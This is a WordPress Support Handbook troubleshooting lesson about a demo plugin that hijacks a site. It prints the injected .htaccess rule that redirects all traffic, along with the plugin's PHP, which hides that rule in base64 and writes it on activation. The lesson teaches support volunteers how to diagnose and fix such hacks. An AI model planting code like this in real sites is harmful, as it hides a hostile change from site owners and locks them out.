WordPress.org

Welcome to the official blog for the WordPress Support team.

Need help with a WordPress issue? You can find help with your WordPress problem by posting in the support forums or asking on the #wordpress IRC channel.

Want to get involved?

Answering a question in the support forums or on IRC is one of the easiest ways to get started. Everyone knows the answer to something!

We have a detailed handbook to help contributors learn how to work with the forums and IRC.

Weekly Meetings

As well as discussing support issues here on the blog, we use Slack for group communication.

Our weekly meeting is held every Thursday 17:00 UTC, with the first meeting of the month being office hours, and the next will be at Thursday, 17:00 UTC (your time zone) in #forums on SlackSlack Slack is a Collaborative Group Chat Platform https://slack.com/. The WordPress community has its own Slack Channel at https://make.wordpress.org/chat/..

Home / Support Handbook / Appendix / Breakfix Lessons / Spam redirect: Hacked .htaccess

Spam redirect: Hacked .htaccess

Install and activate the attached pluginPlugin A plugin is a piece of software containing a group of functions that can be added to a WordPress website. They can extend functionality or add new features to your WordPress websites. WordPress plugins are written in the PHP programming language and integrate seamlessly with WordPress. These can be free in the WordPress.org Plugin Directory https://wordpress.org/plugins/ or can be cost-based plugin from a third-party.

~~ilovedc.zip Download Zip – ilovedc.zip~~

Expected Outcome Expected Outcome

When activated, you are immediately redirected to a different site. You cannot go back to your site at all. Ever.

Top ↑

How to fix How to fix

The first step is, of course, to delete this plugin. However even in doing so, you still can’t get back to your site.

Whenever this happens, it’s likely that the plugin left something on your site. Redirects that are instantaneous are usually caused by something injected into your .htaccess or index.php file. In this case, the .htaccess has the following:

# BEGIN I Love DC
&lt;IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^.*$ http://www.youtube.com/watch?v=oHg5SJYRHA0 [L,R=301]
&lt;/IfModule>
# END I Love DC

(If you are running WordPress out of it’s own directory, the .htaccess will be in that folder. So this site is in /home/user/domain.com/blog/ and the .htaccess would be there).

Once you delete that section from your .htaccess, the ‘hack’ goes away.

Top ↑

Understanding what happened Understanding what happened

The code of the plugin itself is very simple. There is no actually useful code in the plugin at all, and all it does is utilize insert_with_markers(), which is (legitimately) used by WP to add .htaccess rules.

class ILoveDCPlugin {
static function install() {
$htaccess = trailingslashit(ABSPATH).'.htaccess';
$data = base64_decode('PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgICAgICAgUmV3cml0ZUVuZ2luZSBPbgogICAgICAg
IFJld3JpdGVCYXNlIC8KICAgICAgICBSZXdyaXRlUnVsZSBeLiokIGh0dHA6Ly93d3cueW91dHVi
ZS5jb20vd2F0Y2g/dj1vSGc1U0pZUkhBMCBbTCxSPTMwMV0KPC9JZk1vZHVsZT4K');
insert_with_markers($htaccess, 'I Love DC', explode( "\n",$data));
}
}

register_activation_hook( __FILE__, array('ILoveDCPlugin', 'install') );

By using base64_decode(), you know that things are almost always a little nefarious. You can decode the base64 string through Coderstoolbox to decrypt it, and it translates directly to the .htaccess rules we saw.

Long term, the fix is to delete the plugin and never ever use it again.

Last updated: July 18, 2019

s: search
c: compose new post
r: reply
e: edit
t: go to top
j: go to the next post or comment
k: go to the previous post or comment
o: toggle comment visibility
esc: cancel edit post or comment